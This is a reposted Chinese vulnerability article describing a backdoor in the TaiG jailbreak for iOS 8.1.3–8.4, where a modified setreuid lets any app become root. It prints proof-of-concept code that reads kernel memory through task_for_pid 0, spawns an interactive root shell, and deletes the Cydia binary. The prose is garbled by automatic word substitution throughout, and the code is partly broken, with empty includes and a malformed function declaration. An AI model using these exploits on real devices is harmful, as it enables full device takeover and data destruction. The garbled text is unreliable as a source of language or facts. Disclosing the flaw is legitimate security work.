设为主页 | 加入收藏 | 繁體中文
当前位置:首页 > 新闻中心 > 行业资讯 > 电脑研究 > 漏洞研究

太极越狱重大安全后门

   太极越狱iOS8.1.3-8.4含有庞大宁静后门,越狱后招致恣意APP可以提权到Root,从而影响用户数据的宁静。举例来说获取Root权限后可以完全控制系统文件,乃至进一步安装木马等严重威胁用户宁静的恶意软件。

  0x01 细节
  详细分析结果显示太极越狱修改了setreuid这个要害系统API,招致恣意APP都可以直接挪用setreuid(0,0)获得Root执行权限,从而可以修改恣意系统文件、也可以task_for_pid 翻开系统内核句柄从而完全控制系统底层。例如经过写入系统目次“/Library/LaunchDaemons” 可以注册系统办事,从而植入木马、病毒、盗号工具威胁用户隐私数据和密码。
  毛病重现演示如下图:
  示例一:经过 test_taig_backdoor1 步伐读取内核内存
  示例二:经过 test_taig_backdoor2 获得root权限shell
  test_taig_backdoor 读取恣意内核poc代码:
  #!c
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  void dump_kernel_memory(vm_address_t addr)
  {
  kern_return_t kret;
  mach_port_t proc_task = 0;
  vm_size_t ret_size = 0;
  vm_size_t i;
  char buffer[128] = {0};
  int ret;
  ret = task_for_pid(mach_task_self(), 0, &proc_task);
  if (ret != 0)
  {
  NSLog(@"[err] get tfp0 fail: %d", ret);
  return;
  }
  NSLog(@"task for pid 0 = %u", proc_task);
  kret = vm_read_overwrite(proc_task,
  addr,
  sizeof(buffer),
  (vm_address_t)buffer,
  &ret_size);
  char *info = malloc(4096);
  info[0] = '\0';
  for (i = 0; i < ret_size; i++)
  {
  if (i % 16 == 0) sprintf(info + strlen(info), "\n%p: ", (void *)(addr + i));
  sprintf(info + strlen(info), "0x%02x ", *(uint8_t*)(buffer + i));
  }
  NSLog(@"%s", info);
  free(info);
  }
  int main (int argc, const char * argv[])
  {
  if (argc != 2)
  {
  NSLog(@"%s [kernel_address]", argv[0]);
  return 0;
  }
  NSLog(@"current uid=%d euid=%d", getuid(), geteuid());
  /*
  * taig backdoor test
  */
  setreuid(0,0);
  NSLog(@"now uid=%d euid=%d", getuid(), geteuid());
  vm_address_t addr = strtoul(argv[1], NULL, 16);
  dump_kernel_memory(addr);
  return 0;
  }
  test_taig_backdoor2提权poc代码:
  #!c
  void get_root_shell
  {
  setreuid(0,0);
  system("/bin/bash -i");
  }
  在APP中添加下面的代码进行删除文件测试(谨慎执行):
  #!c
  void testBackdoor()
  {
  NSLog(@"以后运行历程 uid=%d euid=%d", getuid(), geteuid());
  setreuid(0,0);
  NSLog(@"后门提权后,以后运行历程 uid=%d euid=%d", getuid(), geteuid());
  NSLog(@"删除恣意文件演示(该测试会招致Cydia无法运行,请谨慎执行)");
  unlink("/Applications/Cydia.app/MobileCydia");
  }
  太极越狱iOS8.0-8.1.1未能找到呆板进行测试,可能也有此庞大后门。
 

    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码:
  
上一篇: 一年之后,雅虎终于修复了SSRF漏洞
下一篇: AirLive IP监控相机存在命令注入漏洞,大量产品受影响

友情链接